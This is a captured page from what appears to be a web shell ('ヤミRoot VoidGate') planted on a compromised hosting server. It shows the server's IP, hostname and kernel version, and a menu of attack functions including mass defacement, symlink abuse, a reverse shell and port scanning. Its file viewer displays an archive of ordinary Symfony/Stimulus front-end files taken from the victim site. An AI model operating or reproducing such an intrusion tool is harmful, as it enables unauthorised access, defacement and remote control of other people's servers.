ヤミRoot VoidGate
User / IP
:
216.73.216.81
Host / Server
:
146.88.233.70 / dev.loger.cm
System
:
Linux hybrid1120.fr.ns.planethoster.net 3.10.0-957.21.2.el7.x86_64 #1 SMP Wed Jun 5 14:26:44 UTC 2019 x86_64
Command
|
Upload
|
Create
Mass Deface
|
Jumping
|
Symlink
|
Reverse Shell
Ping
|
Port Scan
|
DNS Lookup
|
Whois
|
Header
|
cURL
:
/
home
/
logercm
/
dev.loger.cm
/
fixtures
/
assert
/
Viewing: assets.tar
bootstrap.js 0000644 00000000646 15117177605 0007137 0 ustar 00 import { startStimulusApp } from '@symfony/stimulus-bridge'; // Registers Stimulus controllers from controllers.json and in the controllers/ directory export const app = startStimulusApp(require.context( '@symfony/stimulus-bridge/lazy-controller-loader!./controllers', true, /\.[jt]sx?$/ )); // register any custom, 3rd party controllers here // app.register('some_controller_name', SomeImportedController); controllers.json 0000644 00000000310 15117177605 0010011 0 ustar 00 { "controllers": { "@symfony/ux-chartjs": { "chart": { "enabled": true, "fetch": "eager" } } }, "entrypoints": [] } controllers/hello_controller.js 0000644 00000000764 15117177605 0013037 0 ustar 00 import { Controller } from '@hotwired/stimulus'; /* * This is an example Stimulus controller! * * Any element with a data-controller="hello" attribute will cause * this controller to be executed. The name "hello" comes from the filename: * hello_controller.js -> "hello" * * Delete this file or adapt it for your use! */ export default class extends Controller { connect() { this.element.textContent = 'Hello Stimulus! Edit me in assets/controllers/hello_controller.js'; } } styles/app.css 0000644 00000000052 15117177605 0007370 0 ustar 00 body { background-color: lightgray; } app.js 0000644 00000001053 15117177605 0005673 0 ustar 00 /* * Welcome to your app's main JavaScript file! * * We recommend including the built version of this JavaScript file * (and its CSS file) in your base layout (base.html.twig). */ // any CSS you import will output into a single css file (app.css in this case) import './styles/app.css'; import './toasts'; // start the Stimulus application import './bootstrap'; import { startStimulusApp } from '@symfony/stimulus-bridge'; import '@symfony/autoimport'; export const app = startStimulusApp(require.context('../controllers', true, /\.(j|t)sx?$/)); toast.js 0000644 00000000202 15117177605 0006240 0 ustar 00 var toastLiveExample = document.getElementById('liveToast') if (toastLiveExample) { toastLiveExample.classList.add('show'); }
Coded With 💗 by
0x6ick